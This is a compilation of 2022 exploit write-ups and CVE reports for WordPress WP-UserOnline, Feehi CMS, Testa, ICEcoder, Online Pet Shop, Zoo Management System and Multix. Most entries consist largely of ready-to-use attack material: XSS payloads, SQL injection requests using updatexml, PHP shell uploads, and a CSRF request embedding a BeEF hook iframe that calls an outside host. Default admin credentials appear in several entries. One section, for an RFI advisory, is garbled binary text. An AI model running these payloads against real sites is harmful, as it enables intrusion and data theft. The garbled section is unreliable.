WordPress WP-UserOnline plugin version 2.88.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)# Google Dork: inurl:/wp-content/plugins/wp-useronline/# Date: 2022-08-24# Exploit Author: UnD3sc0n0c1d0# Vendor Homepage: https://github.com/lesterchan/wp-useronline# Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip# Category: Web Application# Version: 2.88.0# Tested on: Debian / WordPress 6.0.1# CVE : CVE-2022-2941# Reference: https://github.com/lesterchan/wp-useronline/commit/59c76b20e4e27489f93dee4ef1254d6204e08b3c# 1. Technical Description:The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions up to, and including 2.88.0. This is due to the fact that all fields in the “Naming Conventions” section do not properly sanitize user input, nor escape it on output. This makes it possible for authenticated attackers, with administrative privileges, to inject JavaScript code into the setting that will execute whenever a user accesses the injected page.  # 2. Proof of Concept (PoC):  a. Install and activate version 2.88.0 of the plugin.  b. Go to the plugin options panel (http://[TARGET]/wp-admin/options-general.php?page=useronline-settings).  c. Identify the "Naming Conventions" section and type your payload in any of the existing fields. You can use     the following payload:    <script>alert(/XSS/)</script>  d. Save the changes and now go to the Dashboard/WP-UserOnline option. As soon as you click here, your payload      will be executed.Note: This change will be permanent until you modify the edited fields.

WordPress WP-UserOnline 2.88.0 Cross Site Scripting

Feehi CMS version 2.1.1 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)# Date: 22-08-2022# Exploit Author: yuyudhn# Vendor Homepage: https://feehi.com/# Software Link: https://github.com/liufee/cms# Version: 2.1.1 (REQUIRED)# Tested on: Linux, Docker# CVE : CVE-2022-34140# Proof of Concept:1. Login using admin account at http://feehi-cms.local/admin2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php# Burp request example:POST /admin/index.php?r=ad%2Fcreate HTTP/1.1Host: feehi-cms.localContent-Length: 1530Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://feehi-cms.localContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://feehi-cms.local/admin/index.php?r=ad%2FcreateAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7DConnection: close------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="_csrf_backend"FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[name]"rce------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[tips]"rce at Ad management------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[input_type]"1------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"Content-Type: image/png<?php phpinfo();------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[link]"--------------

Feehi CMS 2.1.1 Remote Code Execution

Testa Online Test Management System version 3.5.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)# Date: 28/08/2022# Exploit Author: Ashkan Moghaddas# Vendor Homepage: https://testa.cc# Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip# Version: 3.5.1# Tested on: Windows/Linux# Proof of Concept:# 1- Install Testa 3.5.1# 2- Go to https://localhost.com/login.php?redirect=XXXX# 3- Add payload to the Tab, the XSS Payload: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E# 4- XSS has been triggered.# Go to this url "https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E"XSS will trigger.

Testa 3.5.1 Cross Site Scripting

A remote file inclusion (RFI) vulnerability in Simple College Website v1.0 allows attackers to execute arbitrary code via a crafted PHP file. This vulnerability is exploitable when the directive allow_url_include is set to On.

�=gGI#Be��ȹȆ��ޡ��G��W��/�xG���UP��s�伶4sק�h�y����o���tŠF�6,�$v&�������z���,� -���a�(t=�י���>�s�l?��WTv:����1L\_�#�UI\]� O�ziC&��>D���Vt�z}���@07ׅ�!����8�ʁ�|V��Y?R\[T�~����w��e�ݭ��e�5�C��^������8T��eRa}��v��o���艃�DJ�$ <\]uʵ�IE� |� �Y���\`x�bD�4�+ =�KۛIXK��a��e\[�@�N��֥2�FV4v�Q;��'��xp>b(D�FȔ��!�H�r��<m(�/9p�Zx���5��LXe���x�vs1<\`n��7�0���^4��1���\[�ԡ �J2L~��^FQ\`#|#Z����K^���ng�4Hj�)�I�����Pa��q����#s����=�ԋ��ϖ T'Ī��1�!�qޡ��y\_R�%�FP�=�W;���-�lE� ��jZ����:������ӹ�42�%��������>�"2�F>�5~��J���hZ>K���F�U�ڗ����0�\\T'�S��)}.|\_�)�)c�Pp�6ߵ�x�7��$G�s���G�p���{��V6�\\6��Ɖ?\]�w�?M5n�bz�VfC5f��\[U��H�n�;�TI����$��=ȑ��r7ď��i�K)j0)G!�!

CVE-2022-40089

ICEcoder v8.1 allows attackers to execute a directory traversal.

//line 62
if (true === isset($\_POST\['username'\]) && "" !== $\_POST\['username'\]) {$username = $\_POST\['username'\] . "\-";};
$settingsFile = 'config-' . $username . str\_replace(".", "\_", str\_replace("www.", "", $\_SERVER\['SERVER\_NAME'\])) . '.php';
// line 110
$ICEcoderUserSettings = $settingsClass\->getConfigUsersSettings($settingsFile);

//line 160
// Note: the source is in the $filename
public function getConfigUsersSettings($fileName)
    {
        // Get users config file details
        $fullPath = $this\->getConfigUsersFileDetails($fileName)\['fullPath'\]; // $fullPath is a source
        $settingsFromFile = $this\->serializedFileData("get", $fullPath); // attacker control the loaded file in this function
        // Now return
        return $settingsFromFile;
    }

//line 142
// Note: the source is in the $filename
public function getConfigUsersFileDetails($fileName)
    {
        // Return details about the users config file
        $fullPath = dirname(\_\_FILE\_\_) . "/../data/" . $fileName;
        $exists = file\_exists($fullPath);
        $readable = is\_readable($fullPath);
        $writable = is\_writable($fullPath);
        $filemtime = filemtime($fullPath);
        return \[
            "fileName" => $fileName,
            "fullPath" => $fullPath,
            "exists" => $exists,
            "readable" => $readable,
            "writable" => $writable,
            "filemtime" => $filemtime,
        \];
    }

// line 226
public function serializedFileData($do, $fullPath, $output\=null)
    {
        if ("get" === $do) {
            if (function\_exists('opcache\_invalidate')) {
                opcache\_invalidate($fullPath, true);
            }
            $data = file\_get\_contents($fullPath); // Note: $fullPath is controlled by the user
            $data = str\_replace("<"."?php\\n/\*\\n\\n", "", $data);
            $data = str\_replace("\\n\\n\*/\\n?"."\>", "", $data);
            $data = unserialize($data);
            return $data;
        }
        if ("set" === $do) {
            if (true === is\_array($output)) {
                $output = serialize($output);
            }
            return false !== file\_put\_contents($fullPath, "<"."?php\\n/\*\\n\\n" . $output . "\\n\\n\*/\\n?" . "\>");
        }
    }

CVE-2022-34026 is assigned to this report.

CVE-2022-34026: directory traversal in ICEcoder

Online Pet Shop We App v1.0 is vulnerable to SQL injection via /pet_shop/classes/Master.php?f=delete_sub_category,id

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: Lime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/classes/Master.php?f=delete\_sub\_category,id

Vulnerability location: /pet\_shop/classes/Master.php?f=delete\_sub\_category,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /pet\_shop/classes/Master.php?f\=delete\_sub\_category HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40934: Bug_report/SQLi-3.md at main · lime-10010/Bug_report

Online Pet Shop We App v1.0 is vulnerable to SQL Injection via /pet_shop/classes/Master.php?f=delete_category,id.

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: Lime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/classes/Master.php?f=delete\_category,id

Vulnerability location: /pet\_shop/classes/Master.php?f=delete\_category,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /pet\_shop/classes/Master.php?f\=delete\_category HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40935: Bug_report/SQLi-2.md at main · lime-10010/Bug_report

Online Pet Shop We App v1.0 by oretnom23 is vulnerable to SQL injection via /pet_shop/classes/Master.php?f=delete_order,id.

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: Lime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/classes/Master.php?f=delete\_order,id

Vulnerability location: /pet\_shop/classes/Master.php?f=delete\_order,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /pet\_shop/classes/Master.php?f\=delete\_order HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40933: Bug_report/SQLi-1.md at main · lime-10010/Bug_report

In Zoo Management System v1.0, there is an arbitrary file upload vulnerability in the picture upload point of the "gallery" file of the "Gallery" module in the background management system.

Permalink

Cannot retrieve contributors at this time

**Zoo Management System v1.0 by pushpam02 has arbitrary code execution (RCE)**

BUG\_Author: Lime

Admind login account: admin@mail.com/Password@123

vendor: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html

Vulnerability url: http://ip/ZooManagementSystem/admin/public\_html/gallery

Loophole location：There is an arbitrary file upload vulnerability (RCE) in the picture upload point of the "gallery" file of the "Gallery" module in the background management system

Request package for file upload：

POST /ZooManagementSystem/admin/public\_html/gallery HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/ZooManagementSystem/admin/public\_html/gallery
Cookie: PHPSESSID=5d10vq7lgptbau7foskstiug7i
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------29223726215286
Content-Length: 330
\-----------------------------29223726215286
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------29223726215286
Content-Disposition: form-data; name="submit\_image"
\-----------------------------29223726215286--

The files will be uploaded to this directory \\ZooManagementSystem\\img\\gallery\\image 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-40932: Bug_report/RCE-1.md at main · lime-10010/Bug_report

Multix version 2.4 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Cross Site Request Forgery# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596# Version: Version 2.4# Tested on Ubuntu 18.04-------Request-----------POST /admin/file/add HTTP/1.1Host: localhostContent-Length: 466Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0mBtYGic6umB5VeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/admin/file/addAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1;Connection: close------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="file_title"<iframe src="http://local.proxy:3000/?url=http://localhost/beefhook.html"></iframe>------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="file_name"; filename="shell2.php .jpg"Content-Type: imageasdasd------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="form1"------WebKitFormBoundaryE0mBtYGic6umB5Ve--

Tag

#php